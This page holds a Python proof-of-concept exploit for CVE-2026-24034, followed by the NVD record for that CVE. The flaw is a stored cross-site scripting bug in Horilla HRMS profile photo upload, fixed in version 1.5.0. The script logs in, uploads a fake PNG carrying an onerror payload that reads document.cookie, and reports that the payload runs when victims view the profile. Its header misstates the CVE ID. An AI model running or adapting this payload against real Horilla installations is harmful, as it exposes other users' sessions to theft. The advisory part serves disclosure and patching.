CVE-2026-24034

#!/usr/bin/env python3 # CVE-2026-2026-24034 PoC - Horilla HRMS XSS via Profile Photo Upload # This PoC demonstrates uploading a malicious file as profile photo import requests import sys target_url = "http://target-host.com" # Replace with actual target login_url = f"{target_url}/accounts/login/" upload_url = f"{target_url}/profile/update/" # XSS payload embedded in a fake image file xss_payload = '<img src=x onerror=alert(document.cookie)>' # Malicious file content with XSS malicious_content = b'\x89PNG\r\n\x1a\n' + xss_payload.encode() session = requests.Session() def exploit(): # Step 1: Login to get authenticated session login_data = { 'username': 'attacker_user', # Replace with valid credentials 'password': 'attacker_pass' } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print("[-] Login failed") return False # Step 2: Upload malicious file as profile photo files = { 'profile_picture': ('malicious.png', malicious_content, 'image/png') } upload_response = session.post(upload_url, files=files, timeout=10) if upload_response.status_code == 200: print("[+] XSS payload uploaded successfully") print("[+] When victims view the attacker's profile, XSS will execute") return True else: print("[-] Upload failed") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-24034", "sourceIdentifier": "[email protected]", "published": "2026-01-22T04:15:59.303", "lastModified": "2026-01-29T19:03:50.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horilla is a free and open source Human Resource Management System (HRMS). In versions prior to 1.5.0, a cross-site scripting vulnerability can be triggered because the extension and content-type are not checked during the profile photo update step. Version 1.5.0 fixes the issue."}, {"lang": "es", "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) de código abierto y gratuito. En versiones anteriores a la 1.5.0, se puede activar una vulnerabilidad de cross-site scripting porque la extensión y el tipo de contenido (content-type) no se verifican durante el paso de actualización de la foto de perfil. La versión 1.5.0 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:horilla:horilla:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "57934F7E-B93F-40A5-9E9A-CB97D7568936"}]}]}], "references": [{"url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-mvwg-7c8w-qw2p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}